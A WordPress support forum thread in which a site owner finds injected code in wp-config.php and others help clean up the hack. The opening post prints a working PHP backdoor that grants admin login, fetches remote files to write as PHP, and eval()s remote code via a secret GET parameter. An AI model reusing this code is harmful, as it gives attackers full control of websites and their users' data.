WordPress.org

Ready to get started?Download WordPress

Forums

What is this in my config.php (11 posts)

  1. webwerkplaats
    Member
    Posted 2 years ago #

    Starting on line 2092 i found the following code:
    What does it do ? My site no longer works.\
    Can whatever it did, IF it did something be fixed ?

    Thanks in advance, Marco

    if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
    if ($_GET['pass'] == 'e4da3b7fbbce2345d7772b0674a318d5'){
    if ($_GET['pingnow']== 'login'){
    $user_login = 'admin';
    $user = get_userdatabylogin($user_login);
    $user_id = $user->ID;
    wp_set_current_user($user_id, $user_login);
    wp_set_auth_cookie($user_id);
    do_action('wp_login', $user_login);
    }
    if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
    $ch = curl_init($_GET['file']);
    $fnm = md5(rand(0,100)).'.php';
    $fp = fopen($fnm, "w");
    curl_setopt($ch, CURLOPT_FILE, $fp);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    curl_exec($ch);
    curl_close($ch);
    fclose($fp);
    echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
    }
    if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
    $ch = curl_init($_GET['file']);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    $re = curl_exec($ch);
    curl_close($ch);
    eval($re);
    }}}
  2. I Dont use this account Anymore why is it still here
    Member
    Posted 2 years ago #

    You are not referring to the wp-config.php file are you? If not, where is this config.php file?

  3. webwerkplaats
    Member
    Posted 2 years ago #

    Yes, i'm sorry. You're absolutely right. It is the wp-config.php
    Thanks for pointing it out to me. Kind regards, Marco

  4. I Dont use this account Anymore why is it still here
    Member
    Posted 2 years ago #

    No idea then - I'm surprised to here you have 2000 lines in your wp-config.php when there should really only be about 90 or so.

    Try reuploading your wp-config.php file (or rather, saving a copy and renaming your wp-config.sample.php) - remember to put your database settings in there.

  5. webwerkplaats
    Member
    Posted 2 years ago #

    Hi,
    Actually, there were more than 4000 ! I deleted all except what is normal. (including databse settings, passwords etc.)
    Nothing happens ! If i try to access the site, i get a "done" but it is a white screen....
    I'm realy lost here.

  6. I Dont use this account Anymore why is it still here
    Member
    Posted 2 years ago #

    You've probably deleted some necessary code, last line should be something in the lines of:

    /** Sets up WordPress vars and included files. */
    require_once(ABSPATH . 'wp-settings.php');
  7. I Dont use this account Anymore why is it still here
    Member
    Posted 2 years ago #

    But personally, I would have just created a new wp-config.php file from your wp-config-sample.php file, put your db details and see how it goes from there.

  8. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

  9. I Dont use this account Anymore why is it still here
    Member
    Posted 2 years ago #

    I'd say so - I would highly recommend changing all passwords, including database passwords.

  10. webwerkplaats
    Member
    Posted 2 years ago #

    Great ! (well..not so great because i haven't fixed it yet) but
    http://ottopress.com/2009/hacked-wordpress-backdoors/
    That's exectly the code i found. I will investigate and let you know.

  11. webwerkplaats
    Member
    Posted 2 years ago #

    Fixed !
    It was indeed the injection as mentioned in:
    http://ottopress.com/2009/hacked-wordpress-backdoors/
    I tried to find the file that caused the damage but couldn't. There are simply too many. That's why i deleted ALL files and directories. NOT the database. From the server control panel i changed the database password but left the rest as it was.
    Disadvantage: you have to install everything again. WordPress and plugins and theme(s).
    Advantage: used all latest version of WP, theme and plugins. Uploaded my photo's and thumbnails after checking (size and dates)
    Than changed the wp-config to the new password and started it again. I had to change the format of the permalinks but that was the only thing. The site was up right away.
    The only thing suggested is to check with PhPMyAdmin for malicious code like iframes IN the database.How is described here:
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-I will do that tomorrow.
    This is a cure. Probably not he most elegant but safest for now and future.
    Hope it might help someone. Thanks for your support !!!

Topic Closed

This topic has been closed to new replies.

About this Topic